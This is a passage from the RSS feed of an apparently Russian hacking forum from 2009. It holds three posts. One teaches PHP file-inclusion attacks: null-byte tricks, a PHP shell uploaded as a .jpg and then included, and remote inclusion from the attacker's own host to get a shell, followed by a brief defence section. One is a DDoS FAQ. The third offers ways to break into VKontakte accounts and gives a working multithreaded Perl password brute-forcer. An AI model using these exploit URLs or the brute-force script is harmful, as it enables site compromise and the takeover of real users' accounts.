www.site/index.php?url=index.php&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Если хотим видеть больше(не только html файлы) добавляем нулевой байт! %00 типа&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;www.site/index.php?url=/index.php%00&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;тогда мы сможем видеть и файлы c Другим расширением&lt;br /&gt;Ну читаем мы файлы и шо дальше?&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;По идее ничего... Но если есть на сайте куда можно залить информацию, то даже много чего можно замутить... Например можно заливать куда нить фотографии и картинки (*.gif, *.jpg) &lt;br /&gt;Заливаем фото только не своё(Ато будет ваше фото а под ним: ХАкер вася пытался взломать нас и залил своё фото на обозрение, шутка, к теме)!!!Мы заливаем файл Картинки с содержанием php шелла то есть обычный шелл только с расширением *.jpg, узнаем куда залилось&lt;br /&gt;Далее его можно проинклудить пусть мы залили его в wwwsite/images/shell.jpg&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;www.site/index.php?url=/images/shell.jpg
или
www.site/index.php?url=../images/shell.jpg&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;У нас шелл в кармане!!! ДАлее делаем что хотим.&lt;br /&gt;можно ещё локальным инклудом откопать и паролли, но это уже не для этой темы&lt;br /&gt;&lt;span style=&quot;color: yellow&quot;&gt;[четвёртый вариант вариант]&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;&amp;lt;? 
.. 
Include (&amp;quot;$patch/papka/file.php&amp;quot;); 
… 
?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Видим: Дописывается расширение php и перед ним стоит папка &amp;quot;papka&amp;quot;&lt;br /&gt;Идём на свой сайт на народе создаём у себя папку: &amp;quot;papka&amp;quot; и заливаем туда наш file.php&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://hacker.narod.ru/papka/file.php&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Теперь заряжаем тал:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site/index.php?url=http://hacker.narod.ru&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Автоматически добавляется papka/file.php&lt;/p&gt;
						&lt;p&gt;Опять мы получаем шелл! ЕЕЕЕ&lt;/p&gt;
						&lt;p&gt;Это всё, что я хотел рассказать. По взлому, &lt;span style=&quot;color: red&quot;&gt;теперь защита.&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 22.5em&quot;&gt;&lt;pre&gt;&amp;lt;? 
.. 
if (file_exists(&amp;quot;$page.php&amp;quot;)) //(Если файл существует=&amp;gt;Инклудить) 
{ 
Include (&amp;quot;$page.php&amp;quot;); 
} 
Else //(Если нет =&amp;gt; Шлём взломщика на куй) 
{ 
Echo &amp;quot;ERROR!&amp;quot;; 
} 
… 
?&amp;gt; 
ФИЛЬТР - НУ КАК ЖЕ БЕЗ НЕГО??&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;$index=str_replace(&amp;quot;/&amp;quot;,&amp;quot;&amp;quot;,$index); 
$index=str_replace(&amp;quot;.&amp;quot;,&amp;quot;&amp;quot;,$index); 
$index=str_replace(&amp;quot;:&amp;quot;,&amp;quot;&amp;quot;,$index); 
$index=str_replace(&amp;quot;&#039;&amp;quot;,&amp;quot;&amp;quot;,$index); 
итд&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (freeman211)</author>
			<pubDate>Tue, 03 Feb 2009 20:06:49 +0300</pubDate>
			<guid>https://rht.apbb.ru/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>Что такое Досс</title>
			<link>https://rht.apbb.ru/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;Что такое ддос атака как реализуеться и прочее FAQ&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Как всегда решил написать интересную статью&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;Введение:&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;-ДДос сейчас стал очень актуальным&lt;br /&gt;-(ведь не нужно много мозгов чтобы убрать на некоторое время сервер)&lt;br /&gt;-Как вы наверно знаете ддос реализуеться через многократные&lt;br /&gt;-подключения в серверу + отсылкой данных (на разные сервесы)&lt;br /&gt;- Например есть обычная http атака (зараженные комьпютеры &lt;br /&gt;-многократно открывают страницу и тем самым нагружая сервер&lt;br /&gt;-(обычно атака идёт с большого количества комьютеров) )&lt;/p&gt;
						&lt;p&gt;===================================&lt;/p&gt;
						&lt;p&gt;Теперь самое интересное:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;ping attack:&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Зараженные комьютеры постоянное время посылают ICMP запросы..&lt;/p&gt;
						&lt;p&gt;Сервер нагружаеться и падает... &lt;/p&gt;
						&lt;p&gt;Защитой от этой атаки являеться простое отключение ответа на пинг&lt;/p&gt;
						&lt;p&gt;-------&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;http attack:&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Как я уже рассказал сначало http флуд&lt;/p&gt;
						&lt;p&gt;происходит через постоянное открытие сайта (ресурса) &lt;/p&gt;
						&lt;p&gt;Как вы понимаете если с 1000 комьютеров постоянно открывать &lt;/p&gt;
						&lt;p&gt;однавременно сайт загрузка на сервер сильно возрастёт что приведёт к &lt;/p&gt;
						&lt;p&gt;падению сервера &lt;/p&gt;
						&lt;p&gt;Обычно http флуд премияться на форумах где есть работа с базой &lt;/p&gt;
						&lt;p&gt;данных (частые соединения с базой сильно грузят серв )&lt;/p&gt;
						&lt;p&gt;Защитой от http флуда может послужить ввод капчи на странице...&lt;/p&gt;
						&lt;p&gt;--------------&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: blue&quot;&gt;udp attack&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;udp флуд это постоянная отправка на сервак UDP пакетов&lt;/p&gt;
						&lt;p&gt;как правило на разные порты... щас этот метод уже не так опасен...&lt;/p&gt;
						&lt;p&gt;--------------&lt;/p&gt;
						&lt;p&gt;Ошибки в скрипта , программах&lt;/p&gt;
						&lt;p&gt;Как все знают существует ддос на скрипты (ошибки в скриптах)&lt;/p&gt;
						&lt;p&gt;Например таже самая ошибка не закрытия соединения с базой может &lt;/p&gt;
						&lt;p&gt;привести к плачевным событиям.&lt;/p&gt;
						&lt;p&gt;Вообщем суть в том что атакующий ищет в системе места которые &lt;/p&gt;
						&lt;p&gt;наиболее нагружает серв и уже ддосит их (больше относиться к http флуду )&lt;/p&gt;
						&lt;p&gt;Или разработчик забыл сделать обработку длинных запросов.. что может &lt;/p&gt;
						&lt;p&gt;привести к отказу в обслуживании (частый случай )&lt;/p&gt;
						&lt;p&gt;====================&lt;/p&gt;
						&lt;p&gt;Итог хочу сказать я против ддос атак и что ддосить плохо&lt;/p&gt;
						&lt;p&gt;(c) Dr. Em@s&lt;/p&gt;</description>
			<author>mybb@mybb.ru (freeman211)</author>
			<pubDate>Tue, 03 Feb 2009 19:52:40 +0300</pubDate>
			<guid>https://rht.apbb.ru/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>Взлом Vkontakte (вконакте) (FAQ) Brute,trojan,СИ,mail</title>
			<link>https://rht.apbb.ru/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[*] Как Взломать аккаунт вконакте?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;1;) брут&lt;/p&gt;
						&lt;p&gt;2;) троян&lt;/p&gt;
						&lt;p&gt;3;) СИ + ФЕЙК&lt;/p&gt;
						&lt;p&gt;4;) через мыло&lt;/p&gt;
						&lt;p&gt;5;) Небольшой прикол.&lt;/p&gt;
						&lt;p&gt;Брутфорс:&lt;/p&gt;
						&lt;p&gt;Брутфорс программа для подбора пароль как по словарю так и рандомно.&lt;/p&gt;
						&lt;p&gt;Вот вам перл скрипт чтобы запустить его вам необходимо скачать актив перл. (Если у кого есть ещё бруты выкладываем.)&lt;/p&gt;
						&lt;p&gt;$dic = ‘passl.txt’; #словарь паролей&lt;br /&gt;$id = 111111; #id цели&lt;br /&gt;$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40&lt;br /&gt;$threads = 4; #количество потоков&lt;/p&gt;
						&lt;p&gt;Конфигурируете скрипт запускаете. Незабываем скачать словарь для брута. Скачать их можно --&lt;a href=&quot;http://forum.whack.ru/showthread.php?t=648&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Это интересно&lt;/a&gt;&lt;span style=&quot;color: red&quot;&gt;ТУТ&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, ”&amp;lt;$dic”);

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads-&amp;gt;create(\&amp;amp;Brut, $_);}
for(@trl) { $_-&amp;gt;join; }

sub Brut
{

while

(@pass){

$pass = shift @pass;

$md5 = MD5-&amp;gt;hexhash($pass);
$sock = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;’tcp’,PeerAddr=&amp;gt;’vkontakte.ru’,PeerPort=&amp;gt;80);
print $sock ”HEAD http://vkontakte.ru/ HTTP/1.0\r\n”.
”Host: vkontakte.ru\r\n”.
”Accept: */*\r\n”.
”Content-Type: application/x-www-form-urlencoded\r\n”.
”User-Agent: Mozillo\r\n”.
”Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.

”Connection: close\r\n\r\n”;
$answ = &amp;lt;$sock&amp;gt;;
close $sock;
print ”$pass $answ”;
if ($answ =~ /302/){
open (good, ‘&amp;gt;&amp;gt;good.txt’);
print good ”$id:$pass:$md5\n”;
print ”$id:$pass:$md5\n”;
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (
){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (freeman211)</author>
			<pubDate>Tue, 03 Feb 2009 19:26:59 +0300</pubDate>
			<guid>https://rht.apbb.ru/viewtopic.php?pid=9#p9</guid>
		</item>
	</channel>
</rss>
